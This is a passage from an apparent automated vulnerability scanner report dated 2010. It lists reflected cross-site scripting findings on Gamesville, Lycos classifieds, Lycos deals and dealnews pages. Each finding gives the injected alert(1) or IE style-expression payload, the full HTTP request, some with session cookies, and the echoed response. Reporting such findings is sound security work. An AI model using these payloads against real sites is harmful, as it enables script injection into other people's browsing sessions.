Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.15. http://blog.gamesville.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc939"><script>alert(1)</script>3fc3efe8798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc939\"><script>alert(1)</script>3fc3efe8798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bc939"><script>alert(1)</script>3fc3efe8798=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/?bc939\"><script>alert(1)</script>3fc3efe8798=1"/>
...[SNIP]...

1.16. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e58b"><script>alert(1)</script>e67fb4e0f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e58b\"><script>alert(1)</script>e67fb4e0f35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com?6e58b"><script>alert(1)</script>e67fb4e0f35=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com?6e58b\"><script>alert(1)</script>e67fb4e0f35=1"/>
...[SNIP]...

1.17. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e28c3"><script>alert(1)</script>c1dd954abbb was submitted in the REST URL parameter 3. This input was echoed as e28c3\"><script>alert(1)</script>c1dd954abbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1e28c3"><script>alert(1)</script>c1dd954abbb HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1e28c3\"><script>alert(1)</script>c1dd954abbb"/>
...[SNIP]...

1.18. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b54dd"><script>alert(1)</script>f9d8de1e657 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b54dd\"><script>alert(1)</script>f9d8de1e657 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1?b54dd"><script>alert(1)</script>f9d8de1e657=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1?b54dd\"><script>alert(1)</script>f9d8de1e657=1"/>
...[SNIP]...

1.19. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d07"><script>alert(1)</script>d04b7f19c87 was submitted in the REST URL parameter 3. This input was echoed as b2d07\"><script>alert(1)</script>d04b7f19c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1b2d07"><script>alert(1)</script>d04b7f19c87 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1b2d07\"><script>alert(1)</script>d04b7f19c87"/>
...[SNIP]...

1.20. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2ca"><script>alert(1)</script>f7c5056a9c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d2ca\"><script>alert(1)</script>f7c5056a9c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1?6d2ca"><script>alert(1)</script>f7c5056a9c8=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3110>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1?6d2ca\"><script>alert(1)</script>f7c5056a9c8=1"/>
...[SNIP]...

1.21. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ba0d"><script>alert(1)</script>f2dc20303b2 was submitted in the REST URL parameter 3. This input was echoed as 4ba0d\"><script>alert(1)</script>f2dc20303b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-14ba0d"><script>alert(1)</script>f2dc20303b2 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-14ba0d\"><script>alert(1)</script>f2dc20303b2"/>
...[SNIP]...

1.22. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40d3"><script>alert(1)</script>221b93386cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e40d3\"><script>alert(1)</script>221b93386cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1?e40d3"><script>alert(1)</script>221b93386cc=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3114>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1?e40d3\"><script>alert(1)</script>221b93386cc=1"/>
...[SNIP]...

1.23. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16eb4"><script>alert(1)</script>b6c9dd0275a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?16eb4"><script>alert(1)</script>b6c9dd0275a=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?16eb4"><script>alert(1)</script>b6c9dd0275a=1&mobile=1" rel="nofollow">
...[SNIP]...

1.24. http://dealnews.com/lw/artclick.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealnews.com
Path:   /lw/artclick.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be8c4<script>alert(1)</script>c1799e733f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html HTTP/1.1
Host: dealnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=bn9ub373pc8q8p5g75cf8jgjion1rvnd; expires=Sun, 09-Jan-2011 14:27:24 GMT; path=/; domain=.dealnews.com
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=utf-8

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html", no longer exists or has moved to a new location.
If you're unable to find what you were looking for, please contact the
<a href="/contact.html">
...[SNIP]...

1.25. http://dealnews.com/lw/artclick.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealnews.com
Path:   /lw/artclick.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be84f<script>alert(1)</script>75d2f5468e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html?2,414584,1328790,eref=lycos HTTP/1.1
Host: dealnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=9es4l9sjbia99svl89q5o3e327nsldmu; expires=Sun, 09-Jan-2011 14:27:27 GMT; path=/; domain=.dealnews.com
Content-Length: 1075
Connection: close
Content-Type: text/html; charset=utf-8

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html", no longer exists or has moved to a new location.
If you're unable to find what you were looking for, please contact the
<a href="/contact.html">
...[SNIP]...

1.26. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656f6"style="x:expression(alert(1))"bdfcf5416e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coupons?656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;656f6"style="x:expression(alert(1))"bdfcf5416e5=1">
...[SNIP]...

1.27. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9bb70"style="x:expression(alert(1))"b6416fcc52e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals?9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals?pn=2&amp;9bb70"style="x:expression(alert(1))"b6416fcc52e=1">
...[SNIP]...

1.28. http://deals.lycos.com/deals/category/automotive-238 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/automotive-238

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff964"style="x:expression(alert(1))"467fcf726ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/automotive-238?ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;ff964"style="x:expression(alert(1))"467fcf726ca=1">
...[SNIP]...

1.29. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e0b4"style="x:expression(alert(1))"76383e47512 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/cameras-167?2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47261

